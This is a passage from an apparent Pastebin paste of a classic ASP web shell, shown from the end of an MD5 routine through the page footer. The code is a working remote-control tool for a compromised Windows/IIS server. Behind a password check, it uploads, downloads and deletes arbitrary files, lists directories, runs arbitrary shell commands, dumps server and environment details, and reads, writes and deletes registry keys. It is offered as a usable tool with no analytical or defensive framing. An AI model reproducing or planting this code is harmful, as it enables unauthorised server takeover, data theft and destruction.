  753. FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE
  754. FF a, b, c, d, x(k + 4), S11, &HF57C0FAF
  755. FF d, a, b, c, x(k + 5), S12, &H4787C62A
  756. FF c, d, a, b, x(k + 6), S13, &HA8304613
  757. FF b, c, d, a, x(k + 7), S14, &HFD469501
  758. FF a, b, c, d, x(k + 8), S11, &H698098D8
  759. FF d, a, b, c, x(k + 9), S12, &H8B44F7AF
  760. FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1
  761. FF b, c, d, a, x(k + 11), S14, &H895CD7BE
  762. FF a, b, c, d, x(k + 12), S11, &H6B901122
  763. FF d, a, b, c, x(k + 13), S12, &HFD987193
  764. FF c, d, a, b, x(k + 14), S13, &HA679438E
  765. FF b, c, d, a, x(k + 15), S14, &H49B40821
  766. GG a, b, c, d, x(k + 1), S21, &HF61E2562
  767. GG d, a, b, c, x(k + 6), S22, &HC040B340
  768. GG c, d, a, b, x(k + 11), S23, &H265E5A51
  769. GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA
  770. GG a, b, c, d, x(k + 5), S21, &HD62F105D
  771. GG d, a, b, c, x(k + 10), S22, &H2441453
  772. GG c, d, a, b, x(k + 15), S23, &HD8A1E681
  773. GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8
  774. GG a, b, c, d, x(k + 9), S21, &H21E1CDE6
  775. GG d, a, b, c, x(k + 14), S22, &HC33707D6
  776. GG c, d, a, b, x(k + 3), S23, &HF4D50D87
  777. GG b, c, d, a, x(k + 8), S24, &H455A14ED
  778. GG a, b, c, d, x(k + 13), S21, &HA9E3E905
  779. GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8
  780. GG c, d, a, b, x(k + 7), S23, &H676F02D9
  781. GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A
  782. HH a, b, c, d, x(k + 5), S31, &HFFFA3942
  783. HH d, a, b, c, x(k + 8), S32, &H8771F681
  784. HH c, d, a, b, x(k + 11), S33, &H6D9D6122
  785. HH b, c, d, a, x(k + 14), S34, &HFDE5380C
  786. HH a, b, c, d, x(k + 1), S31, &HA4BEEA44
  787. HH d, a, b, c, x(k + 4), S32, &H4BDECFA9
  788. HH c, d, a, b, x(k + 7), S33, &HF6BB4B60
  789. HH b, c, d, a, x(k + 10), S34, &HBEBFBC70
  790. HH a, b, c, d, x(k + 13), S31, &H289B7EC6
  791. HH d, a, b, c, x(k + 0), S32, &HEAA127FA
  792. HH c, d, a, b, x(k + 3), S33, &HD4EF3085
  793. HH b, c, d, a, x(k + 6), S34, &H4881D05
  794. HH a, b, c, d, x(k + 9), S31, &HD9D4D039
  795. HH d, a, b, c, x(k + 12), S32, &HE6DB99E5
  796. HH c, d, a, b, x(k + 15), S33, &H1FA27CF8
  797. HH b, c, d, a, x(k + 2), S34, &HC4AC5665
  798. II a, b, c, d, x(k + 0), S41, &HF4292244
  799. II d, a, b, c, x(k + 7), S42, &H432AFF97
  800. II c, d, a, b, x(k + 14), S43, &HAB9423A7
  801. II b, c, d, a, x(k + 5), S44, &HFC93A039
  802. II a, b, c, d, x(k + 12), S41, &H655B59C3
  803. II d, a, b, c, x(k + 3), S42, &H8F0CCC92
  804. II c, d, a, b, x(k + 10), S43, &HFFEFF47D
  805. II b, c, d, a, x(k + 1), S44, &H85845DD1
  806. II a, b, c, d, x(k + 8), S41, &H6FA87E4F
  807. II d, a, b, c, x(k + 15), S42, &HFE2CE6E0
  808. II c, d, a, b, x(k + 6), S43, &HA3014314
  809. II b, c, d, a, x(k + 13), S44, &H4E0811A1
  810. II a, b, c, d, x(k + 4), S41, &HF7537E82
  811. II d, a, b, c, x(k + 11), S42, &HBD3AF235
  812. II c, d, a, b, x(k + 2), S43, &H2AD7D2BB
  813. II b, c, d, a, x(k + 9), S44, &HEB86D391
  814. a = AddUnsigned(a, AA)
  815. b = AddUnsigned(b, BB)
  816. c = AddUnsigned(c, CC)
  817. d = AddUnsigned(d, DD)
  818. Next
  819. MD5 = WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d)
  820. End Function
  821.  
  822. ' Destroys all objects and finishes the work.
  823. Private Sub StopScript()
  824. Set sMD5Hash = nothing
  825. Set WShell = nothing
  826. Set WNetwork = nothing
  827. Set WEnv = nothing
  828. Set FSO = nothing
  829. Set BinStream = nothing
  830. Set sURL = nothing
  831. Set sCmd = nothing
  832. Set bBgMode = nothing
  833. Set bSI = nothing
  834. Set sKey = nothing
  835. Set sKeyFunc = nothing
  836. Set sKeyValue = nothing
  837. Set sKeyType = nothing
  838. Set sDir = nothing
  839. Set sDel = nothing
  840. Set sDL = nothing
  841. Set sPasswd = nothing
  842. Response.End
  843. End Sub
  844.  
  845. ' Password protection:
  846. CheckAuth(sPasswd)
  847.  
  848. ' Process multipart form-data:
  849. If( InStr(1, CStr(Request.ServerVariables("CONTENT_TYPE")), "multipart/form-data;", 1) > 0 ) Then
  850. If Request.TotalBytes > 0 Then
  851. UploadFile()
  852. End If
  853. End If
  854.  
  855. %><%
  856. '/* --- File Download --- */
  857. If ( Not IsEmpty(sDL) ) Then
  858. On Error Resume Next
  859. ' Change locale to "en-us":
  860. SetLocale(1033)
  861. If ( FSO.FileExists(sDL) ) Then
  862. Response.Buffer = True
  863. Response.Clear
  864. Call Response.AddHeader("Content-Disposition", "attachment; filename=""" & FSO.GetFileName(sDL) & """")
  865. Call Response.AddHeader("Content-Length", FSO.GetFile(sDL).Size)
  866. 'Response.Charset = "UTF-8"
  867. Response.ContentType = "application/binary"
  868. ' Try to create ADODB COM object:
  869. Err.Clear
  870. Set BinStream = Server.CreateObject("ADODB.Stream")
  871. If ( Err.Number = 0 ) Then
  872. BinStream.Type = 1 : Rem adTypeBinary
  873. 'BinStream.Charset = "ASCII"
  874. BinStream.Open()
  875. BinStream.LoadFromFile(sDL)
  876. Response.BinaryWrite(BinStream.Read())
  877. Else
  878. ' Use FSO (slow & buggy method) instead.
  879. ' Usually works only with text data:
  880. Err.Clear
  881. Set BinStream = FSO.OpenTextFile(sDL, 1, 0)
  882. While Not BinStream.AtEndOfStream
  883. Response.BinaryWrite(ChrB( Asc( BinStream.Read(1) ) ) )
  884. Wend
  885. BinStream.Close
  886. End If
  887. 'Response.Flush
  888. Set BinStream = nothing
  889. Else
  890. Response.Write("File: " & sDL & " doesn't exist.")
  891. End If
  892. ' Error handling:
  893. If ( Err.Number <> 0 ) Then
  894. Response.Write("Error: '" & Err.Description & "' [" & Err.Number & "]")
  895. Err.Clear
  896. End If
  897. StopScript
  898. End If
  899. %><%
  900. '/* --- HTML Pages Header --- */
  901. %><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  902. <html>
  903. <head>
  904. <meta http-equiv="content-type" content="text/html; charset=windows-1252">
  905. <meta name="robots" content="noindex">
  906. <meta http-equiv="expires" content="0">
  907. <meta http-equiv="pragma" content="no-cache">
  908. <style type="text/css"><!--
  909. body { font-family: sans-serif; background-color: #ffffff; color: #000000; }
  910. table { border-collapse: collapse; font-family: arial, sans-serif; white-space: pre; empty-cells: show; }
  911. td, th { border: 1px solid #909090; font-size: 75%; vertical-align: center; }
  912. th { background-color: #9999cc; }
  913. tr { background-color: #ccccff; text-indent: 5pt; }
  914. tr th { text-indent: 0; }
  915. tr.drv { text-indent: 0; }
  916. tr.dir { font-weight: bold; }
  917. tr.dir:hover { background-color: #eeeeee; }
  918. tr.file:hover { background-color: #eeeeee; }
  919. td.dir { cursor: hand; }
  920. td.file { cursor: hand; }
  921. input, select { font-family: verdana, arial; font-size: 11px; text-decoration: none; border: 1px solid #000000; }
  922. input:hover, select:hover, input:focus, select:focus { border-color: #bc0000; }
  923. input.button { width: 10%; }
  924. input.button:hover { color: #444444; }
  925. .link { color: 0033cc; text-decoration: none; font-style: oblique; }
  926. .link:hover { background-color: #eeeeee; text-decoration: underline; }
  927. i {color: #666666; }
  928. hr {width: 100%; align: center; background-color: #cccccc; border: 0px; height: 1px; }
  929. pre { margin: 0px; font-family: monospace; }
  930. //--></style>
  931. <%
  932. '/* --- Delete item --- */
  933. If ( Not IsEmpty(sDel) ) Then
  934. On Error Resume Next
  935. If ( Right(sDel, 1) = "\" ) Then
  936. If ( FSO.FolderExists(sDel) ) Then
  937. FSO.DeleteFolder(Left(sDel, Len(sDel) - 1))
  938. End If
  939. Else
  940. If ( FSO.FileExists(sDel) ) Then
  941. FSO.DeleteFile(sDel)
  942. End If
  943. End If
  944. ' Error handling:
  945. If ( Err.Number <> 0 ) Then
  946. Response.Write("Error: '" & Err.Description & "' [" & Err.Number & "]")
  947. Err.Clear
  948. End If
  949. End If
  950. '/* --- Directory Listing --- */
  951. If ( Not IsEmpty(sDir) ) Then
  952. %>
  953. <title>[ Directory Listing ]</title>
  954. <script language="JavaScript" type="text/javascript">
  955. <!--
  956. function go(dir_name) {
  957. <%
  958. On Error Resume Next
  959. If ( Not FSO.GetFolder(GetCorrectPath(sDir)).IsRootFolder ) Then %>
  960. if( dir_name == ".." )
  961. document.path.DIR.value = '<%= Replace(FSO.GetFolder(GetCorrectPath(sDir)).ParentFolder.Path, "\", "\\") %>';
  962. else
  963. document.path.DIR.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + '\\' + dir_name;
  964. <% Else %>
  965. document.path.DIR.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + dir_name;
  966. <% End If %>
  967. document.path.submit();
  968. }
  969. function dl(file_name) {
  970. <%
  971. On Error Resume Next
  972. If ( Not FSO.GetFolder(GetCorrectPath(sDir)).IsRootFolder ) Then %>
  973. document.download.DL.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + '\\' + file_name;
  974. <% Else %>
  975. document.download.DL.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + file_name;
  976. <% End If %>
  977. document.download.submit();
  978. }
  979. function del(item_name) {
  980. <% On Error Resume Next %>
  981. if( !confirm("Are you sure you want to delete [" + item_name + "] ?"))
  982. return false;
  983. <% If ( Not FSO.GetFolder(GetCorrectPath(sDir)).IsRootFolder ) Then %>
  984. document.items.DEL.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + '\\' + item_name;
  985. <% Else %>
  986. document.items.DEL.value = '<%= Replace(GetCorrectPath(sDir), "\", "\\") %>' + item_name;
  987. <% End If %>
  988. document.items.submit();
  989. }
  990. -->
  991. </script>
  992. </head>
  993. <body>
  994. <%= InsertNavBar() %>
  995. <%= "Computer name: <i>" & WNetwork.ComputerName & "</i>" %>
  996. <br>
  997. <%= "User: <i>" & WNetwork.UserName & "</i>" %>
  998. <br>
  999. <%= "Path: <i>" & Server.Mappath(Request.ServerVariables("PATH_INFO")) & "</i>" %>
  1000. <br><br>
  1001. <%= ShowDirectoryList(sDir) %>
  1002. <%
  1003. '/* --- Shell --- */
  1004. ElseIf ( Not IsEmpty(sCmd) ) Then
  1005. %>
  1006. <title><%= GetFirstWord(sCmd) %></title>
  1007. </head>
  1008. <body>
  1009. <%= InsertNavBar() %>
  1010. <%= "Computer name: <i>" & WNetwork.ComputerName & "</i>" %>
  1011. <br>
  1012. <%= "User: <i>" & WNetwork.UserName & "</i>" %>
  1013. <br>
  1014. <%= "Path: <i>" & Server.Mappath(Request.ServerVariables("PATH_INFO")) & "</i>" %>
  1015. <br><br>
  1016. <b>Shell command:</b>
  1017. <br>
  1018. <form name="shell" action="<%= sURL %>" method="POST">
  1019. <input type="text" name="CMD" size="45" style="width:100%;" value="<%= Server.HTMLEncode(sCmd) %>">
  1020. <br><br>
  1021. <input type="checkbox" name="CMD_M" id="BG" <%If (bBgMode <> "") Then Response.Write("checked") End If%>>
  1022. <label for="BG">Background mode</label>
  1023. <br><br>
  1024. <input type="submit" class="button" value="Execute">&nbsp;
  1025. <input type="button" class="button" value="Clear" onclick="document.shell.CMD.value=''">
  1026. </form>
  1027. <hr>
  1028. <pre>
  1029. <%
  1030. If ( sCmd <> "" ) Then
  1031. Call ExecuteCmd(sCmd, bBgMode)
  1032. Else
  1033. Response.Write("Enter the command.")
  1034. End If
  1035. %>
  1036. </pre>
  1037. <%
  1038. '/* --- Server Info --- */
  1039. ElseIf( Not IsEmpty(bSI) ) Then
  1040. %>
  1041. <title>[ Server Info For: <%= WNetwork.ComputerName %> ]</title>
  1042. </head>
  1043. <body>
  1044. <%= InsertNavBar() %>
  1045. <center>
  1046. <br><br>
  1047. <%= ShowDrivesInfo() %>
  1048. <br><br>
  1049. <table border="1" cellspacing="0" cellpadding="0" width="620">
  1050. <tr align="center"><th colspan="2">Environment</th></tr>
  1051. <tr><td>COMPUTER</td><td><%= WNetwork.ComputerName %></td></tr>
  1052. <tr><td>PATH_INFO</td><td><%= Server.Mappath(Request.ServerVariables("PATH_INFO")) %></td></tr>
  1053. <tr><td>USER</td><td><%= EmptyToNbsp(WNetwork.UserName) %></td></tr>
  1054. <tr><td>DOMAIN</td><td><%= EmptyToNbsp(WNetwork.UserDomain) %></td></tr>
  1055. <tr><td>SERVER_SOFTWARE</td><td><%= Request.ServerVariables("SERVER_SOFTWARE") %></td></tr>
  1056. <tr><td>SERVER_NAME</td><td><%= Request.ServerVariables("SERVER_NAME") %></td></tr>
  1057. <tr><td>LOCAL_ADDR</td><td><%= Request.ServerVariables("LOCAL_ADDR") %></td></tr>
  1058. <tr><td>NUMBER_OF_PROCESSORS</td><td><%= WEnv("NUMBER_OF_PROCESSORS") %></td></tr>
  1059. <tr><td>PROCESSOR_ARCHITECTURE</td><td><%= WEnv("PROCESSOR_ARCHITECTURE") %></td></tr>
  1060. <tr><td>PROCESSOR_IDENTIFIER</td><td><%= EmptyToNbsp(WEnv("PROCESSOR_IDENTIFIER")) %></td></tr>
  1061. <tr><td>PROCESSOR_LEVEL</td><td><%= EmptyToNbsp(WEnv("PROCESSOR_LEVEL")) %></td></tr>
  1062. <tr><td>PROCESSOR_VERSION</td><td><%= EmptyToNbsp(WEnv("PROCESSOR_VERSION")) %></td></tr>
  1063. <tr><td>OS</td><td><%= EmptyToNbsp(WEnv("OS")) %></td></tr>
  1064. <tr><td>COMSPEC</td><td><%= EmptyToNbsp(WEnv("COMSPEC")) %></td></tr>
  1065. <tr><td>HOMEDRIVE</td><td><%= EmptyToNbsp(WEnv("HOMEDRIVE")) %></td></tr>
  1066. <tr><td>HOMEPATH</td><td><%= EmptyToNbsp(WEnv("HOMEPATH")) %></td></tr>
  1067. <tr><td>PATH</td><td><%= Replace(EmptyToNbsp(WEnv("PATH")), ";", "<br>&nbsp; ") %></td></tr>
  1068. <tr><td>PATHEXT</td><td><%= EmptyToNbsp(WEnv("PATHEXT")) %></td></tr>
  1069. <tr><td>PROMPT</td><td><%= EmptyToNbsp(WEnv("PROMPT")) %></td></tr>
  1070. <tr><td>SYSTEMDRIVE</td><td><%= EmptyToNbsp(WEnv("SYSTEMDRIVE")) %></td></tr>
  1071. <tr><td>SYSTEMROOT</td><td><%= EmptyToNbsp(WEnv("SYSTEMROOT")) %></td></tr>
  1072. <tr><td>WINDIR</td><td><%= EmptyToNbsp(WEnv("WINDIR")) %></td></tr>
  1073. <tr><td>TEMP</td><td><%= EmptyToNbsp(WEnv("TEMP")) %></td></tr>
  1074. <tr><td>TMP</td><td><%= EmptyToNbsp(WEnv("TMP")) %></td></tr>
  1075. <tr><td>SCRIPT_ENGINE</td><td><%= ScriptEngine %> (Ver.<%= ScriptEngineMajorVersion %>.<%= ScriptEngineMinorVersion %>.<%= ScriptEngineBuildVersion %>)</td></tr>
  1076. <tr><td>ADODB.STREAM</td><td><%
  1077. ' Try to create ADODB COM object:
  1078. On Error Resume Next
  1079. Err.Clear
  1080. Set BinStream = Server.CreateObject("ADODB.Stream")
  1081. If ( Err.Number = 0 ) Then
  1082. Response.Write("Passed")
  1083. Else
  1084. Response.Write("Limited download / upload functionality")
  1085. End If
  1086. %>
  1087. </td></tr>
  1088. <tr><td>LOCALE</td><td><%= SetLocale(0) %></td></tr>
  1089. </table>
  1090. <br><br>
  1091. </center>
  1092. <%
  1093. '/* --- Registry Editor --- */
  1094. ElseIf ( Not IsEmpty(sKey) ) Then
  1095. %>
  1096. <title>[ Registry Editor ]</title>
  1097. </head>
  1098. <body>
  1099. <%= InsertNavBar() %>
  1100. <%= "Computer name: <i>" & WNetwork.ComputerName & "</i>" %>
  1101. <br>
  1102. <%= "User: <i>" & WNetwork.UserName & "</i>" %>
  1103. <br>
  1104. <%= "Path: <i>" & Server.Mappath(Request.ServerVariables("PATH_INFO")) & "</i>" %>
  1105. <br><br>
  1106. <b>Registry key:</b>
  1107. <br>
  1108. <form name="regedit" action="<%= sURL %>" method="POST">
  1109. <input type="text" name="RKEY" size="45" style="width:100%;" value="<%= sKey %>">
  1110. <br><br>
  1111. <b>Value:</b>
  1112. <br>
  1113. <input type="text" name="RKEY_V" size="45" style="width:100%;" value="<%= sKeyValue %>">
  1114. <br><br>
  1115. <b>Type:</b>
  1116. <br>
  1117. <select name="RKEY_T" style="width: 150px" size="1">
  1118. <option value="REG_SZ" <%If ( sKeyType = "REG_SZ" or IsEmpty(sKeyType) ) Then Response.Write("selected") End If%>>REG_SZ</option>
  1119. <option value="REG_DWORD" <%If ( sKeyType = "REG_DWORD" ) Then Response.Write("selected") End If%>>REG_DWORD</option>
  1120. <option value="REG_BINARY" <%If ( sKeyType = "REG_BINARY" ) Then Response.Write("selected") End If%>>REG_BINARY</option>
  1121. <option value="REG_EXPAND_SZ" <%If ( sKeyType = "REG_EXPAND_SZ" ) Then Response.Write("selected") End If%>>REG_EXPAND_SZ</option>
  1122. </select>
  1123. <br><br>
  1124. <b>Function:</b>
  1125. <br>
  1126. <input type="radio" name="RKEY_F" value="Read" <%If ( sKeyFunc = "Read" or IsEmpty(sKeyFunc) ) Then Response.Write("checked") End If%>>
  1127. <label for="RKEY_F">Read</label><br>
  1128. <input type="radio" name="RKEY_F" value="Write" <%If (sKeyFunc = "Write") Then Response.Write("checked") End If%>>
  1129. <label for="RKEY_F">Write</label><br>
  1130. <input type="radio" name="RKEY_F" value="Delete" <%If (sKeyFunc = "Delete") Then Response.Write("checked") End If%>>
  1131. <label for="RKEY_F">Delete</label><br>
  1132. <br>
  1133. <input type="submit" class="button" value="Execute">&nbsp;
  1134. <input type="button" class="button" value="Clear" onclick="document.regedit.RKEY.value='';document.regedit.RKEY_V.value=''">
  1135. </form>
  1136. <hr>
  1137. <pre>
  1138. <%
  1139. If ( sKey <> "" ) Then
  1140. Call RegEditor(sKey, sKeyValue, sKeyType, sKeyFunc)
  1141. Else
  1142. Response.Write("Enter the key.")
  1143. End If
  1144. %>
  1145. </pre>
  1146. <%
  1147. End If
  1148. '/* --- HTML Pages Footer --- */
  1149. %>
  1150. </body>
  1151. </html>
  1152.  
  1153.  
  1154. <%
  1155. StopScript 'asd
  1156. %>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!